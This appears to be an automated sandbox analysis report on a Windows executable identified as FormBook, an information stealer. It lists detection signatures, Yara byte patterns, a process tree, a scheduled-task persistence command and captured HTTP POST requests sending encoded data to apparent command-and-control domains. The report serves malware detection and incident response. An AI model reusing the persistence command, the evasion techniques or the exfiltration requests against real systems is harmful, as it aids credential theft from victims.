### Loading ...

Play interactive tourEdit tour

# Analysis Report uVSV3amss8eu5Sr.exe

## Overview

### General Information

 Sample Name: uVSV3amss8eu5Sr.exe Analysis ID: 284766 MD5: f5b3eeda9a5ee1d268e43145a714a048 SHA1: a8f05b3bb98ba1345c8f881874e199fc2d1d1fb5 SHA256: 9cf67c23623cce81e8eb40bf7eca0f951ea6aa8cdf87531511f88424fb4d6917 Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64uVSV3amss8eu5Sr.exe (PID: 6132 cmdline: 'C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe' MD5: F5B3EEDA9A5EE1D268E43145A714A048)schtasks.exe (PID: 6520 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)uVSV3amss8eu5Sr.exe (PID: 6060 cmdline: {path} MD5: F5B3EEDA9A5EE1D268E43145A714A048)explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)cmd.exe (PID: 3356 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b257:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18339:\$sqlite3step: 68 34 1C 7B E1
• 0x1844c:\$sqlite3step: 68 34 1C 7B E1
• 0x18368:\$sqlite3text: 68 38 2A 90 C5
• 0x1848d:\$sqlite3text: 68 38 2A 90 C5
• 0x1837b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184a3:\$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x926a8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x92912:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x13fce8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x13ff52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9e435:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14ba75:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x9df21:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14b561:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x9e537:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14bb77:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x9e6af:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x14bcef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x9332a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x14096a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x9d19c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x14a7dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x94023:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x141663:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0xa4017:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x151657:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0xa502a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 17 entries
SourceRuleDescriptionAuthorStrings
3.2.uVSV3amss8eu5Sr.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
3.2.uVSV3amss8eu5Sr.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8ae8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14875:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14361:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14977:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14aef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x976a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x135dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa463:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1a457:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1b46a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.uVSV3amss8eu5Sr.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x17539:\$sqlite3step: 68 34 1C 7B E1
• 0x1764c:\$sqlite3step: 68 34 1C 7B E1
• 0x17568:\$sqlite3text: 68 38 2A 90 C5
• 0x1768d:\$sqlite3text: 68 38 2A 90 C5
• 0x1757b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x176a3:\$sqlite3blob: 68 53 D8 7F 8C
3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b257:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 1 entries

## Sigma Overview

### System Summary:

 Sigma detected: Scheduled temp file as task from temp location Show sources
 Source: Process started Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe' , ParentImage: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp', ProcessId: 6520

## Signature Overview

Click to jump to signature section

### AV Detection:

 Multi AV Scanner detection for domain / URL Show sources
 Source: http://www.camdio.xyz/k8b/ Virustotal: Detection: 6% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Roaming\JOOUCiAlE.exe Virustotal: Detection: 23% Perma Link
 Multi AV Scanner detection for submitted file Show sources
 Source: uVSV3amss8eu5Sr.exe Virustotal: Detection: 23% Perma Link
 Yara detected FormBook Show sources
 Source: Yara match File source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Machine Learning detection for dropped file Show sources
 Source: C:\Users\user\AppData\Roaming\JOOUCiAlE.exe Joe Sandbox ML: detected
 Machine Learning detection for sample Show sources
 Source: uVSV3amss8eu5Sr.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 4x nop then pop edi 3_2_00416BF6 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 4x nop then pop edi 3_2_0040E38C Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 13_2_0050E38C Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 13_2_00516C45

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49765
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /k8b/?8pMx8v9p=Sc78I+Kxf/VxlwaPaPJkOLmTTyipGii8jZ5N2jAlgkHWx8NYJM9FuUX0xspAlguusSd1&Gzux=Wb2pdLjh7 HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /k8b/?8pMx8v9p=vAYaSr9qvHk7KCO7uWDlCoh8YGLtM5zRcLRoyBCgnX/aO/BnpSe24HN21iT/EXq7SkdF&Gzux=Wb2pdLjh7 HTTP/1.1Host: www.camdio.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: OVHFR OVHFR Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.mensajera-radio.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mensajera-radio.online/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 61 2d 33 47 57 5a 6d 64 52 59 4e 74 37 79 58 50 41 66 45 75 59 66 4f 74 62 58 53 42 46 67 61 69 37 73 6b 62 76 7a 63 67 6c 30 4c 41 34 38 4e 68 4c 64 74 64 6b 67 32 6e 73 75 64 73 71 53 61 6a 6a 58 41 76 48 4c 28 6a 74 44 79 6b 37 61 52 5f 54 6e 57 33 39 49 78 33 6a 30 68 44 6f 6e 4f 57 7e 49 66 4a 64 31 78 4f 66 64 77 74 79 7a 70 6f 67 46 42 4d 4d 45 67 48 75 58 45 45 72 39 38 74 64 34 6c 63 55 41 69 42 4a 2d 43 41 52 32 78 51 6b 79 65 41 64 63 7e 57 33 49 77 7a 41 38 4c 57 56 6a 41 72 42 41 34 69 62 48 53 43 45 33 72 6a 6c 70 67 51 6f 5a 65 6a 70 47 59 58 69 52 69 37 66 38 4d 41 78 51 79 6f 44 6c 78 44 72 39 7a 56 41 7a 70 66 78 35 33 33 68 66 35 78 5a 79 48 2d 4a 55 53 79 62 58 4a 43 79 31 30 50 45 72 71 4c 62 72 4e 30 74 7a 77 6e 6b 57 72 53 7e 48 37 36 46 4a 57 47 76 6d 39 6e 45 32 73 33 74 7a 6c 6a 59 30 4a 51 4b 36 4d 68 66 70 73 79 32 4b 33 4f 70 7a 70 31 46 4f 6e 33 7a 72 39 41 56 30 28 65 35 64 72 6a 42 75 35 5f 57 30 63 5f 52 4e 58 6f 47 64 6c 74 46 67 38 61 6a 38 65 66 54 75 6e 66 75 49 79 75 30 66 78 42 50 78 76 7a 45 41 4b 71 68 71 6c 63 78 2d 28 46 47 66 4a 69 34 39 67 36 49 5f 53 50 6b 46 67 71 79 5f 59 4e 4a 4a 4f 34 77 30 48 37 6b 72 38 6d 35 66 56 62 78 6b 59 30 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8pMx8v9p=a-3GWZmdRYNt7yXPAfEuYfOtbXSBFgai7skbvzcgl0LA48NhLdtdkg2nsudsqSajjXAvHL(jtDyk7aR_TnW39Ix3j0hDonOW~IfJd1xOfdwtyzpogFBMMEgHuXEEr98td4lcUAiBJ-CAR2xQkyeAdc~W3IwzA8LWVjArBA4ibHSCE3rjlpgQoZejpGYXiRi7f8MAxQyoDlxDr9zVAzpfx533hf5xZyH-JUSybXJCy10PErqLbrN0tzwnkWrS~H76FJWGvm9nE2s3tzljY0JQK6Mhfpsy2K3Opzp1FOn3zr9AV0(e5drjBu5_W0c_RNXoGdltFg8aj8efTunfuIyu0fxBPxvzEAKqhqlcx-(FGfJi49g6I_SPkFgqy_YNJJO4w0H7kr8m5fVbxkY0Yw). Source: global traffic HTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeContent-Length: 167694Cache-Control: no-cacheOrigin: http://www.mensajera-radio.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mensajera-radio.online/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 61 2d 33 47 57 59 75 52 43 34 42 38 28 44 33 4f 50 70 6b 63 63 65 7e 7a 52 78 61 73 4d 54 4b 63 6c 4d 49 74 76 7a 73 73 6a 32 6a 30 39 64 39 68 4a 65 46 51 7e 51 32 6f 71 75 64 72 75 53 47 66 71 67 38 6e 48 4b 37 5a 74 44 36 72 68 73 74 32 43 58 58 33 37 6f 30 47 68 77 49 58 6f 6c 4b 6a 77 4c 7a 52 59 31 39 4f 62 75 41 76 33 57 30 72 6e 45 4e 35 42 55 38 43 73 54 59 42 6f 4f 34 56 61 75 74 36 46 46 36 48 65 39 65 4c 64 57 41 48 75 46 71 62 41 63 36 64 72 37 4e 31 4f 37 54 53 59 43 41 4a 4e 68 34 68 46 48 36 45 52 46 7a 46 76 37 4d 35 76 5a 75 52 70 46 34 48 72 47 4f 71 62 5f 6f 49 69 77 53 43 49 77 4a 46 7a 71 66 33 57 47 46 55 39 61 7e 6c 70 36 46 71 65 69 72 52 46 32 72 5f 56 57 68 35 68 30 34 44 63 4f 47 7a 61 61 5a 73 6c 54 67 59 71 78 32 61 30 33 62 79 57 37 61 6b 67 6d 39 63 58 6d 73 72 6e 6a 46 62 54 68 34 63 4e 72 63 66 4e 61 63 6d 79 62 4c 50 75 77 41 75 4b 50 4f 7a 7e 36 6c 55 64 6b 76 4d 79 64 75 76 42 59 63 42 66 55 64 67 59 76 28 6a 47 64 6b 53 46 68 39 48 69 4e 4b 66 53 5f 47 54 76 76 75 79 6a 50 78 6d 4a 6c 7a 4c 57 33 79 41 68 71 74 63 78 50 50 6a 46 4d 70 69 38 76 49 35 49 65 53 50 6b 31 67 71 72 50 5a 70 61 63 54 6f 7a 45 76 32 6f 70 38 41 79 36 34 75 37 51 64 41 4d 5a 33 69 4b 59 28 56 6f 34 6c 74 66 77 49 4a 6b 6b 42 37 43 62 58 47 31 6e 74 42 78 6c 48 46 45 4e 30 65 36 50 28 35 33 6d 49 32 76 50 4b 34 72 2d 58 4e 32 58 70 46 49 71 38 37 65 71 45 6b 30 32 67 48 75 71 47 36 73 43 33 51 33 35 49 57 56 49 78 47 37 42 63 76 77 36 50 5f 45 57 31 69 45 49 4e 70 6c 62 7a 34 4c 74 59 41 7e 2d 47 43 32 68 50 50 73 70 47 62 41 58 47 6e 6c 33 62 43 45 4f 30 4b 43 78 31 76 43 77 31 6a 55 78 6f 46 45 5a 36 5a 64 67 6f 6a 68 30 30 62 64 6f 7e 67 68 78 79 4d 41 56 78 51 37 51 67 76 58 34 30 75 53 48 63 6c 4c 79 4e 67 51 66 43 39 6d 31 50 64 7a 54 38 33 62 34 35 6a 4a 51 6e 7a 35 45 41 30 6a 65 4f 5f 42 69 59 6a 34 58 68 58 37 4c 4e 72 6e 49 54 35 34 36 61 37 65 6b 6e 4a 4d 47 57 33 70 72 4d 32 61 5a 53 4f 6d 62 77 6e 6e 59 65 36 43 39 49 6f 30 68 4a 50 28 6f 78 63 46 71 6e 70 70 49 52 43 70 78 42 6f 47 61 55 63 59 58 6a 42 52 4f 62 32 42 6d 52 61 73 62 62 55 37 52 6e 59 31 2d 78 59 55 2d 41 44 42 49 75 76 45 64 47 67 4d 46 42 6c 66 4b 52 69 5a 38 6d 4a 50 48 67 76 79 34 6f 68 38 4e 57 6e 74 4e 44 73 79 59 38 7a 28 4e 49 4a 53 6f 75 50 37 5f 7e 56 49 66 6b 7a 4e 72 74 45 32 41 61 39 5a 63 70 6a 4a 4a 51 39 4d 59 54 4f 6e 38 6f 39 32 76 67 43 6a 4f 54 45 4b 74 70 4d 66 62 68 49 6c 2d 5a 5f 46 58 7a 5f 64 67 6e 31 6f 74 49 56 72 68 48 69 55 45 33 4b 68 65 63 56 49 6e 59 4f 6c 4e 59 66 43 79 52 5 Source: global traffic HTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.camdio.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.camdio.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.camdio.xyz/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 6e 69 55 67 4d 4c 77 5a 72 56 34 35 66 51 6e 79 35 68 43 34 53 66 56 36 62 45 7e 68 47 72 6a 4d 48 37 30 42 6d 68 36 66 6b 33 6a 77 41 72 52 6e 6d 33 62 44 71 33 4d 42 76 41 72 53 46 58 47 41 55 58 63 4c 45 38 6e 75 6c 46 70 6c 63 43 6b 74 68 35 4c 6d 67 51 75 6c 64 68 74 61 73 76 71 30 73 37 7a 59 63 4f 58 56 39 79 47 6e 39 49 28 69 73 43 76 47 33 6f 6c 42 58 5f 5a 47 52 77 62 6d 47 76 54 5a 47 6a 53 65 6f 65 39 51 4e 5f 42 6c 64 38 34 65 33 78 66 4a 6e 6f 5a 4b 76 62 6e 66 64 71 72 64 35 53 56 48 69 75 4d 4a 72 6f 6e 4c 37 47 72 5a 65 5a 79 68 57 68 51 45 57 4a 75 48 48 58 4d 43 31 34 6c 46 54 39 4b 42 7e 67 56 31 62 6c 71 55 55 38 5a 59 6f 4c 74 6e 6b 5a 6e 39 74 55 59 75 63 55 30 42 36 5a 47 79 32 4d 47 31 35 6e 41 4a 7a 79 7e 69 32 72 43 35 6e 6d 6e 6a 42 56 28 54 47 4d 70 75 4a 6b 32 64 6a 4f 59 35 57 59 44 30 79 41 75 73 33 4d 65 55 55 4c 4a 69 5a 4a 70 35 4a 42 64 64 48 37 47 45 31 6d 51 35 4e 4d 65 67 46 54 4c 6c 64 5f 68 71 50 65 6a 79 42 35 38 46 54 30 76 57 69 66 31 66 42 51 62 47 46 32 6b 71 37 6f 64 34 77 2d 53 62 6a 53 48 31 4d 67 44 43 49 6d 67 70 6c 5f 32 6a 55 71 39 72 47 37 4c 63 32 48 78 6f 57 52 70 67 4f 68 61 38 6f 48 31 59 51 67 72 45 75 37 72 6b 5a 47 47 69 42 77 29 2e 00 5f 53 50 6b 46 67 71 Data Ascii: 8pMx8v9p=niUgMLwZrV45fQny5hC4SfV6bE~hGrjMH70Bmh6fk3jwArRnm3bDq3MBvArSFXGAUXcLE8nulFplcCkth5LmgQuldhtasvq0s7zYcOXV9yGn9I(isCvG3olBX_ZGRwbmGvTZGjSeoe9QN_Bld84e3xfJnoZKvbnfdqrd5SVHiuMJronL7GrZeZyhWhQEWJuHHXMC14lFT9KB~gV1blqUU8ZYoLtnkZn9tUYucU0B6ZGy2MG15nAJzy~i2rC5nmnjBV(TGMpuJk2djOY5WYD0yAus3MeUULJiZJp5JBddH7GE1mQ5NMegFTLld_hqPejyB58FT0vWif1fBQbGF2kq7od4w-SbjSH1MgDCImgpl_2jUq9rG7Lc2HxoWRpgOha8oH1YQgrEu7rkZGGiBw)._SPkFgq Source: global traffic HTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.camdio.xyzConnection: closeContent-Length: 167694Cache-Control: no-cacheOrigin: http://www.camdio.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.camdio.xyz/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 6e 69 55 67 4d 50 4e 6f 70 6c 38 73 56 43 7a 7a 28 78 79 67 44 50 6c 6f 52 6a 76 38 50 5a 6a 32 4b 4d 4d 52 6d 68 4b 62 69 30 72 75 4b 72 42 6e 67 78 76 45 77 6e 4d 47 74 41 72 52 42 58 4b 4f 64 6d 34 54 45 35 65 4c 6c 46 78 6d 58 67 38 6f 68 4a 4c 39 78 41 6a 57 62 68 35 37 73 74 75 6e 76 59 66 32 58 75 54 56 7a 69 4f 35 7a 4e 61 6b 37 77 4c 5a 36 34 6f 4c 56 2d 42 66 53 48 6a 53 55 5f 4c 6e 42 69 50 34 76 70 42 62 49 38 5a 65 66 62 6b 76 71 52 4c 45 71 37 6b 4d 67 63 33 6c 63 75 47 6f 67 6a 56 41 7e 71 6f 4c 75 71 7e 68 7e 33 76 4b 63 4b 71 66 57 69 78 7a 65 66 4f 57 44 57 41 4b 6d 35 70 6a 5a 6f 71 48 6a 42 55 6d 4d 57 44 75 53 38 4a 6e 67 75 52 67 67 4a 61 39 73 57 52 31 45 52 59 51 34 6f 4b 32 34 59 43 4e 35 30 73 42 78 79 4f 64 69 35 69 69 7e 6d 48 37 43 57 54 70 49 4d 70 46 4c 6b 32 5a 77 2d 34 52 54 74 6a 76 34 78 65 43 32 4e 61 41 51 66 78 6a 61 4d 31 6c 4d 67 46 32 46 4b 65 44 68 47 42 47 61 4d 61 72 47 42 57 54 58 66 68 6d 42 4d 4c 31 42 35 38 4a 54 31 76 77 69 72 6c 66 54 79 44 72 42 58 6b 32 35 6f 64 66 79 4b 32 5a 71 41 44 6c 4d 67 4c 43 49 58 51 48 33 66 4f 6a 46 4d 52 6f 47 5a 7a 63 31 33 78 6f 44 42 6f 6f 49 42 62 4d 68 47 4e 48 43 78 75 36 73 37 53 61 4e 56 4c 36 61 54 6f 69 38 7a 4e 45 71 45 4d 31 6f 46 58 35 41 54 58 75 77 41 4d 62 79 6a 4a 64 33 77 4a 53 56 44 51 4f 64 73 79 4a 4a 4a 78 6a 68 41 78 31 69 6a 39 4f 4b 38 51 4c 68 53 68 66 5a 4c 4a 44 4c 68 66 6c 54 32 72 64 47 67 41 62 36 59 73 37 6e 6f 71 62 41 33 78 43 34 51 6f 43 69 71 78 7a 64 33 77 44 53 46 61 74 52 61 59 30 6c 56 56 4f 68 53 76 44 6f 53 48 34 64 57 4c 39 55 58 6f 62 6b 6e 4f 61 35 68 6d 55 67 41 67 55 63 37 48 46 41 5a 4a 56 65 73 41 4d 71 4f 67 32 4b 50 77 79 37 5a 4d 48 34 36 67 59 58 51 41 4d 64 30 72 49 50 5a 62 44 47 73 4d 4f 61 51 4d 79 74 6c 71 36 34 78 76 46 74 69 6d 75 42 67 46 75 58 54 50 62 67 48 6a 61 7a 70 65 64 6f 43 39 5a 61 6c 6b 5a 56 44 79 52 6d 58 76 73 39 56 79 48 47 65 42 72 46 35 4e 4e 4a 50 36 79 52 69 46 64 47 4a 52 79 39 52 37 41 70 61 75 69 30 69 75 5a 69 45 47 50 50 72 6c 41 5a 7a 59 51 30 73 4d 4c 58 79 74 33 6d 6a 49 66 33 30 65 53 5a 71 76 30 50 42 4b 49 37 2d 75 61 45 68 41 39 58 49 34 55 28 63 64 51 51 72 77 33 34 5f 28 57 4b 57 52 74 6b 4e 4f 37 65 41 34 75 4d 41 72 50 6d 6a 4f 6d 73 50 68 36 48 64 50 30 4a 4c 36 4d 69 58 6a 76 68 79 30 74 78 62 62 34 51 61 58 79 71 38 4d 64 78 59 30 78 7e 69 6e 31 61 57 7e 37 77 55 58 79 57 39 69 30 78 66 54 7a 47 54 49 65 65 39 35 39 61 6b 64 68 28 70 6a 7a 4a 59 69 72 50 33 79 59 7e 6c 79 33 47 7a 45 43 64 31 73 41 62 6c 67 35 57 4b 4e 72 54 57 47 78 7e 7a 58 49 65 73 72 4
 Downloads files from webservers via HTTP Show sources
